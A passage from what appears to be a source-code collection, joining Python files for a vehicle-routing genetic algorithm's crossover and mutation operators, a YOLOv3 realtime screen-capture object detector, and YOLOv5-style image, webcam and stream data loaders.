# # sys.stderr.write("sending two points\n")
if __name__ == "__main__":
main()
|
operators.py | import copy
from random import shuffle
from typing import Dict, List, Union
from Ombuki.constants import MUTATION_REVERSAL_LENGTH
from Ombuki.auxiliaries import is_nondominated, mmoeasa_is_nondominated
from Ombuki.ombukiSolution import OmbukiSolution
from MMOEASA.mmoeasaSolution import MMOEASASolution
from threading import Thread, currentThread
from destination import Destination
from problemInstance import ProblemInstance
from vehicle import Vehicle
from common import rand, INT_MAX
def set_up_crossover_child(instance: ProblemInstance, parent_one: Union[OmbukiSolution, MMOEASASolution], parent_two_vehicle: Vehicle) -> OmbukiSolution:
crossover_solution = copy.deepcopy(parent_one)
# check commentary of "set_up_crossover_child" in "../FIGA/operators.py"
nodes_to_remove = set([d.node.number for d in parent_two_vehicle.get_customers_visited()])
i = 0
while i < len(crossover_solution.vehicles) and nodes_to_remove:
increment = True
j = 1
while j <= crossover_solution.vehicles[i].get_num_of_customers_visited() and nodes_to_remove:
destination = crossover_solution.vehicles[i].destinations[j]
if destination.node.number in nodes_to_remove:
nodes_to_remove.remove(destination.node.number)
crossover_solution.vehicles[i].current_capacity -= destination.node.demand
if crossover_solution.vehicles[i].get_num_of_customers_visited() - 1 > 0:
del crossover_solution.vehicles[i].destinations[j]
else:
increment = False
del crossover_solution.vehicles[i]
break # break, otherwise the while loop will start searching the next vehicle with "j" as the same value; without incrementing "i" and starting "j" at 0
else:
j += 1
if increment:
i += 1
crossover_solution.calculate_nodes_time_windows(instance)
crossover_solution.calculate_vehicles_loads(instance)
return crossover_solution
def original_crossover_thread(instance: ProblemInstance, solution: Union[OmbukiSolution, MMOEASASolution], parent_vehicle: Vehicle, result: Dict[str, Union[OmbukiSolution, MMOEASASolution]]) -> None:
# check commentary of "crossover" in "../FIGA/operators.py"
# the difference in this operator is that when no feasible insertion point is found and the amount of vehicles in the solution is at the limit, a new one is created anyway (which is bad)
crossover_solution = set_up_crossover_child(instance, solution, parent_vehicle)
randomized_destinations = list(range(1, len(parent_vehicle.destinations) - 1))
shuffle(randomized_destinations)
for d in randomized_destinations:
parent_destination = parent_vehicle.destinations[d]
best_vehicle, best_position = INT_MAX, 0
shortest_from_previous, shortest_to_next = (float(INT_MAX),) * 2
found_feasible_location = False
for i, vehicle in enumerate(crossover_solution.vehicles):
if not vehicle.current_capacity + parent_destination.node.demand > instance.capacity_of_vehicles:
for j in range(1, len(crossover_solution.vehicles[i].destinations)):
distance_from_previous = instance.get_distance(vehicle.destinations[j - 1].node.number, parent_destination.node.number)
distance_to_next = instance.get_distance(parent_destination.node.number, vehicle.destinations[j].node.number)
simulated_arrival_time = vehicle.destinations[j - 1].departure_time + distance_from_previous
if simulated_arrival_time < parent_destination.node.ready_time:
simulated_arrival_time = parent_destination.node.ready_time
simulated_departure_time = simulated_arrival_time + parent_destination.node.service_duration
if not (simulated_arrival_time > parent_destination.node.due_date or simulated_departure_time + distance_to_next > vehicle.destinations[j].node.due_date) \
and (distance_from_previous < shortest_from_previous and distance_to_next <= shortest_to_next) or (distance_from_previous <= shortest_from_previous and distance_to_next < shortest_to_next):
best_vehicle, best_position, shortest_from_previous, shortest_to_next = i, j, distance_from_previous, distance_to_next
found_feasible_location = True
if not found_feasible_location:
best_vehicle = len(crossover_solution.vehicles)
crossover_solution.vehicles.append(Vehicle.create_route(instance, parent_destination.node))
else:
crossover_solution.vehicles[best_vehicle].destinations.insert(best_position, copy.deepcopy(parent_destination))
crossover_solution.vehicles[best_vehicle].calculate_vehicle_load(instance)
crossover_solution.vehicles[best_vehicle].calculate_destinations_time_windows(instance)
crossover_solution.vehicles[best_vehicle].calculate_length_of_route(instance)
crossover_solution.objective_function(instance)
result[currentThread().getName()] = crossover_solution # since threads cannot return values, the values are assigned to a mutable type instead (a dict in this case)
def modified_crossover_thread(instance: ProblemInstance, solution: Union[OmbukiSolution, MMOEASASolution], parent_vehicle: Vehicle, result: Dict[str, Union[OmbukiSolution, MMOEASASolution]]) -> None:
# check commentary of "crossover" in "../FIGA/operators.py"
# the difference in this operator is that when no feasible insertion point is found and the amount of vehicles in the solution is at the limit, the destination to be inserted is appended to the end of the route where the route's last destination is nearest to the deatination to be inserted
crossover_solution = set_up_crossover_child(instance, solution, parent_vehicle)
randomized_destinations = list(range(1, len(parent_vehicle.destinations) - 1))
shuffle(randomized_destinations)
for d in randomized_destinations:
parent_destination = parent_vehicle.destinations[d]
best_vehicle, best_position = -1, 0
shortest_from_previous, shortest_to_next = (float(INT_MAX),) * 2
found_feasible_location = False
for i, vehicle in enumerate(crossover_solution.vehicles):
if not vehicle.current_capacity + parent_destination.node.demand > instance.capacity_of_vehicles:
for j in range(1, len(crossover_solution.vehicles[i].destinations)):
distance_from_previous = instance.get_distance(vehicle.destinations[j - 1].node.number, parent_destination.node.number)
distance_to_next = instance.get_distance(parent_destination.node.number, vehicle.destinations[j].node.number)
simulated_arrival_time = vehicle.destinations[j - 1].departure_time + distance_from_previous
if simulated_arrival_time < parent_destination.node.ready_time:
simulated_arrival_time = parent_destination.node.ready_time
simulated_departure_time = simulated_arrival_time + parent_destination.node.service_duration
if not (simulated_arrival_time > parent_destination.node.due_date or simulated_departure_time + distance_to_next > vehicle.destinations[j].node.due_date) \
and (distance_from_previous < shortest_from_previous and distance_to_next <= shortest_to_next) or (distance_from_previous <= shortest_from_previous and distance_to_next < shortest_to_next):
best_vehicle, best_position, shortest_from_previous, shortest_to_next = i, j, distance_from_previous, distance_to_next
found_feasible_location = True
if not found_feasible_location:
if len(crossover_solution.vehicles) < instance.amount_of_vehicles:
best_vehicle = len(crossover_solution.vehicles)
crossover_solution.vehicles.append(Vehicle.create_route(instance, parent_destination.node))
else:
sorted_with_index = sorted(crossover_solution.vehicles, key=lambda veh: instance.get_distance(veh.destinations[-2].node.number, parent_destination.node.number))
for infeasible_vehicle in sorted_with_index:
if infeasible_vehicle.current_capacity + parent_destination.node.demand < instance.capacity_of_vehicles:
infeasible_vehicle.destinations.insert(infeasible_vehicle.get_num_of_customers_visited() + 1, copy.deepcopy(parent_destination))
break
else:
crossover_solution.vehicles[best_vehicle].destinations.insert(best_position, copy.deepcopy(parent_destination))
crossover_solution.vehicles[best_vehicle].calculate_vehicle_load(instance)
crossover_solution.vehicles[best_vehicle].calculate_destinations_time_windows(instance)
crossover_solution.vehicles[best_vehicle].calculate_length_of_route(instance)
crossover_solution.objective_function(instance)
result[currentThread().getName()] = crossover_solution # since threads cannot return values, the values are assigned to a mutable type instead (a dict in this case)
def crossover(instance: ProblemInstance, parent_one: Union[OmbukiSolution, MMOEASASolution], parent_two: Union[OmbukiSolution, MMOEASASolution], use_original: bool) -> Union[OmbukiSolution, MMOEASASolution]:
parent_one_vehicle = parent_one.vehicles[rand(0, len(parent_one.vehicles) - 1)]
parent_two_vehicle = parent_two.vehicles[rand(0, len(parent_two.vehicles) - 1)]
# threads cannot return values, so they need to be given a mutable type that can be given the values we'd like to return; in this instance, a dict is used and the return values are assigned using the thread names
# threading is used because Ombuki's crossover creates two child solutions
thread_results: Dict[str, Union[OmbukiSolution, MMOEASASolution]] = {"child_one": None, "child_two": None}
child_one_thread = Thread(name="child_one", target=original_crossover_thread if use_original else modified_crossover_thread, args=(instance, parent_one, parent_two_vehicle, thread_results))
child_two_thread = Thread(name="child_two", target=original_crossover_thread if use_original else modified_crossover_thread, args=(instance, parent_two, parent_one_vehicle, thread_results))
child_one_thread.start()
child_two_thread.start()
child_one_thread.join()
child_two_thread.join()
# from the two child solutions, return the dominating one
thread_results["child_two"].id = thread_results["child_one"].id
if instance.acceptance_criterion == "MMOEASA":
return thread_results["child_one"] if mmoeasa_is_nondominated(thread_results["child_one"], thread_results["child_two"]) else thread_results["child_two"]
return thread_results["child_one"] if is_nondominated(thread_results["child_one"], thread_results["child_two"]) else thread_results["child_two"]
def get_next_vehicles_destinations(solution: Union[OmbukiSolution, MMOEASASolution], vehicle: int, first_destination: int, remaining_destinations: int) -> List[Destination]:
if not remaining_destinations: # if the amount of destinations left to acquire is equal to zero, then return an empty list
return list()
num_customers = solution.vehicles[vehicle].get_num_of_customers_visited()
if num_customers < first_destination + remaining_destinations: # if the vehicle does not contain "remaining_destinations" amount of nodes, starting from "first_destination" position in the list, then we need to move to the next vehicle for destinations
return solution.vehicles[vehicle].destinations[first_destination:num_customers + 1] + get_next_vehicles_destinations(solution, vehicle + 1, 1, remaining_destinations - ((num_customers + 1) - first_destination))
else: # otherwise, the vehicle contains enough destinations between "first_destination" and the end of its list of destinations
return solution.vehicles[vehicle].destinations[first_destination:first_destination + remaining_destinations]
def set_next_vehicles_destinations(solution: Union[OmbukiSolution, MMOEASASolution], vehicle: int, first_destination: int, remaining_destinations: int, reversed_destinations: List[Destination]) -> None:
# most of the logic here is similar to "get_next_vehicles_destinations", the only difference being that, in this function, the nodes are being inserted instead of acquired
if not (remaining_destinations and reversed_destinations):
return
num_customers = solution.vehicles[vehicle].get_num_of_customers_visited()
if num_customers < first_destination + remaining_destinations:
num_customers_inclusive = (num_customers + 1) - first_destination # list slicing is exclusive of the end point (meaning it would end at num_customers - 1), so + 1 will fix the exclusion
solution.vehicles[vehicle].destinations[first_destination:num_customers + 1] = reversed_destinations[:num_customers_inclusive]
del reversed_destinations[:num_customers_inclusive]
set_next_vehicles_destinations(solution, vehicle + 1, 1, remaining_destinations - num_customers_inclusive, reversed_destinations)
else:
solution.vehicles[vehicle].destinations[first_destination:first_destination + remaining_destinations] = reversed_destinations
reversed_destinations.clear()
def mutation(instance: ProblemInstance, solution: Union[OmbukiSolution, MMOEASASolution]) -> Union[OmbukiSolution, MMOEASASolution]:
num_nodes_to_swap = rand(2, MUTATION_REVERSAL_LENGTH)
first_reversal_node = rand(1, (len(instance.nodes) - 1) - num_nodes_to_swap)
vehicle_num = -1
num_destinations_tracker = 0
for i, vehicle in enumerate(solution.vehicles): # because the mutation operator considers the routes as one collective chromosome (list of destinations from 1 to n, excluding starts and ends at the depot), we need to find which vehicle the position "first_reversal_node" belongs to if the solution were a chromosome
if not num_destinations_tracker + vehicle.get_num_of_customers_visited() > first_reversal_node: # as soon as the sum of destinations is greater than "first_reversal_node", we've arrived at the vehicle where reversal should start
num_destinations_tracker += vehicle.get_num_of_customers_visited()
else:
vehicle_num = i
break
first_destination = (first_reversal_node - num_destinations_tracker) + 1 # get the position of the "first_reversal_node" in the vehicle; + 1 to discount the depot at index 0 in the vehicle's destinations
# the reason that the get and set functions are called recursively is because the mutation operator specified by Ombuki can swap customers across vehicles
# therefore, the first call of the recursive functions can get/set the first one/two customers from one vehicle, then any remaining customers in the next vehicle
reversed_destinations = get_next_vehicles_destinations(solution, vehicle_num, first_destination, num_nodes_to_swap)
reversed_destinations = list(reversed(reversed_destinations))
set_next_vehicles_destinations(solution, vehicle_num, first_destination, num_nodes_to_swap, reversed_destinations)
solution.vehicles[vehicle_num].calculate_vehicle_load(instance)
solution.vehicles[vehicle_num].calculate_destinations_time_windows(instance)
solution.vehicles[vehicle_num].calculate_length_of_route(instance)
solution.objective_function(instance)
return solution |
realtime_detect.py | import colorsys
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '2'
import cv2
import numpy as np
from keras import backend as K
from keras.models import load_model
from keras.layers import Input
from yolo3.model import yolo_eval, yolo_body, tiny_yolo_body
from yolo3.utils import image_preporcess
import multiprocessing
from multiprocessing import Pipe
import mss
import time
# set start time to current time
start_time = time.time()
# displays the frame rate every 2 second
display_time = 2
# Set primarry FPS to 0
fps = 0
start_time = time.time()
display_time = 2 # displays the frame rate every 2 second
fps = 0
sct = mss.mss()
# Set monitor size to capture
monitor = {"top": 40, "left": 0, "width": 1080, "height": 1080}
class YOLO(object):
_defaults = {
#"model_path": 'logs/ep050-loss21.173-val_loss19.575.h5',
"model_path": 'logs/trained_weights_final.h5',
"anchors_path": 'model_data/yolo_anchors.txt',
"classes_path": '4_CLASS_test_classes.txt',
"score" : 0.3,
"iou" : 0.45,
"model_image_size" : (416, 416),
"text_size" : 3,
}
@classmethod
def get_defaults(cls, n):
if n in cls._defaults:
return cls._defaults[n]
else:
return "Unrecognized attribute name '" + n + "'"
def __init__(self, **kwargs):
self.__dict__.update(self._defaults) # set up default values
self.__dict__.update(kwargs) # and update with user overrides
self.class_names = self._get_class()
self.anchors = self._get_anchors()
self.sess = K.get_session()
self.boxes, self.scores, self.classes = self.generate()
def _get_class(self):
classes_path = os.path.expanduser(self.classes_path)
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def _get_anchors(self):
anchors_path = os.path.expanduser(self.anchors_path)
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
def generate(self):
model_path = os.path.expanduser(self.model_path)
assert model_path.endswith('.h5'), 'Keras model or weights must be a .h5 file.'
# Load model, or construct model and load weights.
num_anchors = len(self.anchors)
num_classes = len(self.class_names)
is_tiny_version = num_anchors==6 # default setting
try:
self.yolo_model = load_model(model_path, compile=False)
except:
self.yolo_model = tiny_yolo_body(Input(shape=(None,None,3)), num_anchors//2, num_classes) \
if is_tiny_version else yolo_body(Input(shape=(None,None,3)), num_anchors//3, num_classes)
self.yolo_model.load_weights(self.model_path) # make sure model, anchors and classes match
else:
assert self.yolo_model.layers[-1].output_shape[-1] == \
num_anchors/len(self.yolo_model.output) * (num_classes + 5), \
'Mismatch between model and given anchor and class sizes'
print('{} model, anchors, and classes loaded.'.format(model_path))
# Generate colors for drawing bounding boxes.
hsv_tuples = [(x / len(self.class_names), 1., 1.)
for x in range(len(self.class_names))]
self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
self.colors = list(
map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),
self.colors))
np.random.shuffle(self.colors) # Shuffle colors to decorrelate adjacent classes.
# Generate output tensor targets for filtered bounding boxes.
self.input_image_shape = K.placeholder(shape=(2, ))
boxes, scores, classes = yolo_eval(self.yolo_model.output, self.anchors,
len(self.class_names), self.input_image_shape,
score_threshold=self.score, iou_threshold=self.iou)
return boxes, scores, classes
def detect_image(self, image):
if self.model_image_size != (None, None):
assert self.model_image_size[0]%32 == 0, 'Multiples of 32 required'
assert self.model_image_size[1]%32 == 0, 'Multiples of 32 required'
boxed_image = image_preporcess(np.copy(image), tuple(reversed(self.model_image_size)))
image_data = boxed_image
out_boxes, out_scores, out_classes = self.sess.run(
[self.boxes, self.scores, self.classes],
feed_dict={
self.yolo_model.input: image_data,
self.input_image_shape: [image.shape[0], image.shape[1]],#[image.size[1], image.size[0]],
K.learning_phase(): 0
})
#print('Found {} boxes for {}'.format(len(out_boxes), 'img'))
thickness = (image.shape[0] + image.shape[1]) // 600
fontScale=1
ObjectsList = []
for i, c in reversed(list(enumerate(out_classes))):
predicted_class = self.class_names[c]
box = out_boxes[i]
score = out_scores[i]
label = '{} {:.2f}'.format(predicted_class, score)
#label = '{}'.format(predicted_class)
scores = '{:.2f}'.format(score)
top, left, bottom, right = box
top = max(0, np.floor(top + 0.5).astype('int32'))
left = max(0, np.floor(left + 0.5).astype('int32'))
bottom = min(image.shape[0], np.floor(bottom + 0.5).astype('int32'))
right = min(image.shape[1], np.floor(right + 0.5).astype('int32'))
mid_h = (bottom-top)/2+top
mid_v = (right-left)/2+left
# put object rectangle
cv2.rectangle(image, (left, top), (right, bottom), self.colors[c], thickness)
# get text size
(test_width, text_height), baseline = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, thickness/self.text_size, 1)
# put text rectangle
cv2.rectangle(image, (left, top), (left + test_width, top - text_height - baseline), self.colors[c], thickness=cv2.FILLED)
# put text above rectangle
cv2.putText(image, label, (left, top-2), cv2.FONT_HERSHEY_SIMPLEX, thickness/self.text_size, (0, 0, 0), 1)
# add everything to list
ObjectsList.append([top, left, bottom, right, mid_v, mid_h, label, scores])
return image, ObjectsList
def close_session(self):
self.sess.close()
def detect_img(self, image):
image = cv2.imread(image, cv2.IMREAD_COLOR)
original_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
original_image_color = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
r_image, ObjectsList = self.detect_image(original_image_color)
return r_image, ObjectsList
def GRABMSS_screen(p_input):
while True:
#Grab screen image
img = np.array(sct.grab(monitor))
# Put image from pipe
p_input.send(img)
def SHOWMSS_screen(p_output):
global fps, start_time
yolo = YOLO()
while True:
img = p_output.recv()
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
r_image, ObjectsList = yolo.detect_image(img)
cv2.imshow("YOLO v3", r_image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
return
fps+=1
TIME = time.time() - start_time
if (TIME) >= display_time :
print("FPS: ", fps / (TIME))
fps = 0
start_time = time.time()
if cv2.waitKey(1) & 0xFF == ord('q'): break
yolo.close_session()
if __name__=="__main__":
p_output, p_input = Pipe()
# creating new processes
p1 = multiprocessing.Process(target=GRABMSS_screen, args=(p_input,))
p2 = multiprocessing.Process(target=SHOWMSS_screen, args=(p_output,))
# starting our processes
p1.start()
p2.start()
|
datasets.py | import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.utils import xyxy2xywh, xywh2xyxy
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=stride,
pad=pad)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, 8]) # number of workers
dataloader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class LoadImages: # for inference
def __init__(self, path, img_size=640):
path = str(Path(path)) # os-agnostic
files = []
if os.path.isdir(path):
files = sorted(glob.glob(os.path.join(path, '*.*')))
elif os.path.isfile(path):
files = [path]
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
nI, nV = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nF = nI + nV # number of files
self.video_flag = [False] * nI + [True] * nV
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nF > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(path, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nF:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nF: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nF, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nF, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nF # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0):
try:
path = str(Path(path)) # os-agnostic
parent = str(Path(path).parent) + os.sep
if os.path.isfile(path): # file
with open(path, 'r') as f:
f = f.read().splitlines()
f = [x.replace('./', parent) if x.startswith('./') else x for x in f] # local to global path
elif os.path.isdir(path): # folder
f = glob.iglob(path + os.sep + '*.*')
else:
raise Exception('%s does not exist' % path)
self.img_files = [x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats]
except:
raise Exception('Error loading data from %s. See %s' % (path, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt')
for x in self.img_files]
# Read image shapes (wh)
sp = path.replace('.txt', '') + '.shapes' # shapefile path
try:
with open(sp, 'r') as f: # read existing shapefile
s = [x.split() for x in f.read().splitlines()]
assert len(s) == n, 'Shapefile out of sync'
except:
s = [exif_size(Image.open(f)) for f in tqdm(self.img_files, desc='Reading image shapes')]
np.savetxt(sp, s, fmt='%g') # overwrites existing (if any)
self.shapes = np.array(s, dtype=np.float64)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache labels
self.imgs = [None] * n
self.labels = [np.zeros((0, 5), dtype=np.float32)] * n
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
np_labels_path = str(Path(self.label_files[0]).parent) + '.npy' # saved labels in *.npy file
if os.path.isfile(np_labels_path):
s = np_labels_path # print string
x = np.load(np_labels_path, allow_pickle=True)
if len(x) == n:
self.labels = x
labels_loaded = True
else:
s = path.replace('images', 'labels')
pbar = tqdm(self.label_files)
for i, file in enumerate(pbar):
if labels_loaded:
l = self.labels[i]
# np.savetxt(file, l, '%g') # save *.txt from *.npy file
else:
try:
with open(file, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
except:
nm += 1 # print('missing labels for image %s' % self.img_files[i]) # file missing
continue
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = 'Caching labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
s, nf, nm, ne, nd, n)
